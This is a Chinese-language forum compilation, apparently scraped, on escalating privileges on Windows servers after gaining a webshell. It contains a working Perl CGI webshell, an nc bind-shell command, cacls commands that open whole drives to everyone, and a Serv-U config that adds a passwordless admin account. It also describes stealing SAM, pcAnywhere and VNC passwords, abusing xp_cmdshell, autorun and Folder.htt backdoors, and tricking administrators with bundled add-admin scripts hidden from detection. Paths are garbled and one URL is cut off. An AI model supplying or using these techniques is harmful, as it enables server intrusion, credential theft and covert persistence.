pcanywhere提权windows 提权命令是什么？

得到wedshell后怎么提权啊

本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候，下一部要做的就是提升权限 个人总结如下： 1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能 否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆 2.C:WINNTsystem32config进这里下它的SAM，破解用户的密码 c:winnt epaire 下是备份 用到破解sam密码的软件有LC，SAMinside 3.C:Documents and SettingsAll Users「开始」菜单程序 看这里能跳转不，我们从这里 可以获取好多有用的信息 可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否 跳转 进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空 [USER=dede|1] Password= HomeDir=c: TimeOut=600 Maintenance=System ess1=C:|RWAMELCDP ess1=d:|RWAMELCDP ess1=f:|RWAMELCDP SKEYValues= 这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限 ServUAdmin.ini ServUDaemon.ini 4.c:winntsystem32srvdata就是这个目录，同样是erveryone 完全控制，我们所要做 的就是把提升权限的工具上传上去，然后执行 5.看能否跳转到如下目录 c:php, 用phpspy c:prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html ", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f///ig; $execthis = $_; syswrite(STDOUT, " ", 13); open(STDERR, ">&STDOUT") || die "Can't redirect STDERR"; system($execthis); syswrite(STDOUT, " ", 17); close(STDERR); close(STDOUT); exit; 保存为cgi执行, 如果不行，可以试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 mand" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 现在是 IUSR 权限，提交： http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe c: /E /T /G everyone:F" http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe d: /E /T /G everyone:F" http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe e: /E /T /G everyone:F" http:/

域用户怎样给自己提权？

自己是没办法提权的，只有让管理员“帮你提权”！方法很多，你可以写一些添加管理员或者提权的脚本诱惑管理员打开或者放在开始菜单的启动文件夹里让管理员重启动时脚本自动运行，我推荐你用捆绑的方法，这样不易被发现。

需要:一个.bat文件（cmd批处理：功能是添加用户并提权）， 一个.vbs文件(vbs脚本：功能主要是让bat后台运行，不弹出cmd窗口), 一个管理员常用的软件， 然后用windows自带的捆绑软件（在运行里输入 iexpress）把以上三个文件捆绑成一个文件并设置运行顺序（首先运行vbs，然后运行软件）。

呵呵，具体的脚本命令你可以在网上搜，不会了再问我！ 如果想弄的天衣无缝的话，建议：1.捆绑应用软件前先备份 2.捆绑后，用一个图标修改软件把捆绑后的软件图标修改成和以前一样的 3.提权后（管理员运行后）把备份的软件替换回来（不然的话，如果是重复添加相同用户可能会报错） 4.如果是新添加了一个管理员用户，这样很容易被发现，建议进行把该账号进行隐藏和克隆。

呵呵，以上技术只供研究，不提倡使用！ 这和“公司的电脑都没光驱或软驱”没什么联系。

拿到webshell后如何提权拿下他的服务器？

以下全部是入侵提权的一些总结，很多方法至今没有机会试验也不一定成功，但是我是的确看见别人成功过的。

现在贴出一些别人的经验总结。

希望对朋友有帮助！ 1.radmin连接法 条件是你权限够大，对方连防火墙也没有。

封装个radmin上去，运行，开对方端口，然后radmin上去。

本人从来没成功过，端口到是给对方打开了。

2.paanywhere C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 这里下他的GIF文件，在本地安装pcanywhere上去。

3.SAM破解 C:WINNTsystem32config 下他的SAM 破解之。

4.SU密码夺取 C:Documents and SettingsAll Users「开始」菜单程序引用：Serv-U，然后本地查看属性，知道路径后，看能否跳转。

进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空。

[USER=WekweN|1] Password= HomeDir=c: TimeOut=600 Maintenance=System ess1=C:|RWAMELCDP ess1=d:|RWAMELCDP ess1=f:|RWAMELCDP SKEYValues= 这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限。

5.c:winntsystem32srvdata 引用：就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行。

6.SU溢出提权 这个网上教程N多，不详细讲解了。

7.运行Csript 引用：运行"cscript C:pubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提升权限。

用这个cscript C:pubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps ，查看有特权的dll文件：idq.dll srvasp.dll (不同的机子放的位置不一定一样)，我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32srvsrvsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32srvasp.dll" 。

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了。

8.脚本提权 c:Documents and SettingsAll Users「开始」菜单程序启动"写入bat，vbs。

9.VNC 默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Password，我们可以用vncx4破解它。

vncx4使用很简单，只要在命令行下输入： c:>vncx4 -W 然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。

10.NC提权 给对方来个NC，但是条件是你要有足够的运行权限，然后把它反弹到自己的电脑上。

11.社会工程学之GUEST提权 很简单，查看他的用户。

一般来说看到帐户以后，密码尽量猜。

可能用户密码一样，也可能是他QQ号、邮箱号、手机号。

尽量看看。

12.IPC空连接 如果对方真比较白痴的话，扫他的IPC，如果运气好还是弱口令。

13.替换服务 这个不用说了吧？个人感觉相当复杂。

14.autorun .inf autorun=xxx.exe，这个=后面自己写。

加上只读、系统、隐藏属性，传到哪个盘都可以的，不相信他不运行。

.ini与Folder.htt 引用：首先，我们现在本地建立一个文件夹，名字不重要。

进入它，在空白处点右键，选择“自定义文件夹”（xp好像是不行的）一直下点，默认即可。

完成后，你就会看到在此目录下多了两个名为Folder setting的文件架与.ini的文件，（如果你看不到，先取消“隐藏受保护的操作系统文件”），然后我们在Folder setting目录下找到Folder.htt文件，记事本打开。

在任意地方加入以下代码：，然后你将你的后门文件放在Folder setting目录下，把此目录与.ini一起上传到对方任意一个目录下，就可以了。

只要等管理员浏览了此目录，它就执行了我们的后门。

16.su覆盖提权 本地安装个su，将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉，重起一下Serv-U，于是你上面的所有配置都与他的一模一样了。

17.SU转发端口 43958这个是 Serv －U 的本地管理端口，FPIPE.exe上传他，执行命令： Fpipe ?Cv ?Cl 3333 ?Cr 43958 127.0.0.1 意思是将4444端口映射到43958端口上。

然后就可以在本地安装一个Serv-u，新建一个服务器，IP填对方IP，帐号为LocalAdministrator 密码为$ak#.1k;0@p">#1@$ak#.1k;0@p，连接上后你就可以管理他的Serv-u了。

18.SQL帐户密码泄露 如果对方开了MSSQL服务器，我们就可以通过用SQL连接器加管理员帐号（可以从他的连接数据库的ASP文件中看到），因为MSSQL是默认的SYSTEM权限。

引用：对方没有删除xp_cmdshell方法：使用Sqlexec.exe，在host一栏中填入对方IP，User与Pass中填入你所得到的用户名与密码。

format选择xp_cmdshell”%s”即可。

然后点击connect，连接上后就可以在CMD一栏中输入你想要的CMD命令了。

19.asp.dll 引用：因为asp.dll是放在c:winntsystem32srvasp.dll (不同的机子放的位置不一定相同)，我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32srvsrvsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32srvasp.dll"。

好了，现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 了。

注意，用法中的get和set，一个是查看一个是设置，还有就是你运行上面的你要到C:pubAdminScripts>这个目录下。

那么如果你是一个管理员，你的机子被人用这招把asp提升为system权限，那么，这时，防的方法就是把asp.dll 剔出特权一族。

也就是用set这个命令，覆盖掉刚才的那些东东。

windows 提权命令是什么？

进入纯DOS(MSDOS中我没有试过),新建一个用户和密码,或者使用你原来的这个也是可以的,并把这个账号提升到管理员权限.命令是:建立用户账号,NET USER 用户名 密码 /ADD 提升权限用NET LOCALGROUP ADMINISTRATORS 用户名 /ADD.记住那个/ADD一定要加的,因为那是强制执行.